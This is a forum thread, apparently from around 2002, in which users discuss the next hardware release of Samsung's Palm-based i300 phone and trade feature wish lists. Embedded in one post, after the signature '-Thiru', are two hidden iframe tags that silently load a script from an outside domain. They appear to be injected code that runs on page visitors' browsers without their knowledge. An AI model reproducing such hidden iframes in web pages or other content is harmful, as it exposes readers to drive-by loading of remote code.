+ Reply to Thread

Unhappy Next release of Samsung Palm Phone

Following is the reply from Samsung Tech group for my inquiry about the next release(Hardware) of this wonderful phone.

"Thank you for your inquiry. It's possible another version will be available by Q4 next year."
    Samtech22

I was hoping to get it much sooner
    -Thiru<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

This phone is definitely good enough in my opinion to get you by until the next one. How much smaller can the screen get and keep touch screen functionality??

Its not so much the size of the screen , but other factors like

i) Higher Memory
    ii) Faster processor
    iii) Expansion slot
    iv ) 3G support
    v) Active Matrix with higher resolution
    vi) Speaker phone button
    vii) USB support

etc that I would like to see in the next release. With advancing technologies , I hope Samsung will still be able to maintain the size of the device at the same level(or even smaller ).

Do you think a hack could be made to program the speaker phone icon to work with one of the programmable buttons on the bottom of the phone?

Originally posted by thiru
    Its not so much the size of the screen , but other factors like

ii) Faster processor
    vii) USB support

etc that I would like to see in the next release. With advancing technologies , I hope Samsung will still be able to maintain the size of the device at the same level(or even smaller ).
    ii) I noticed no difference between my i300 and my PalmV. Inevitably faster processors will become available, but the i300 as it is today has mainstream performance (and best of breed of other features, which is why I bought it in the first place).

vii) I've got USB support (using the sync cable) already.

If you're waiting for these (and the other) features before buying, you'll be waiting for some time since not even the newest Palms nor any other palm-os hardware will meet the spec you listed...

Heck, on my desktop computer I've wanted a faster hard drive bus (the slowest component of a PC) for many years now, but that hasn't prevented me from getting a new PC and the added value I get in other areas.
    Last edited by crlipman; 01-10-2002 at 10:37 AM.

No, I wouldnt be waiting for all these features..just a wish list , not a show stopper.

Higher memory,brightness control, ,speakerphone button, better one-handed dialing and 3G support are some things I would definetely expect in the next release.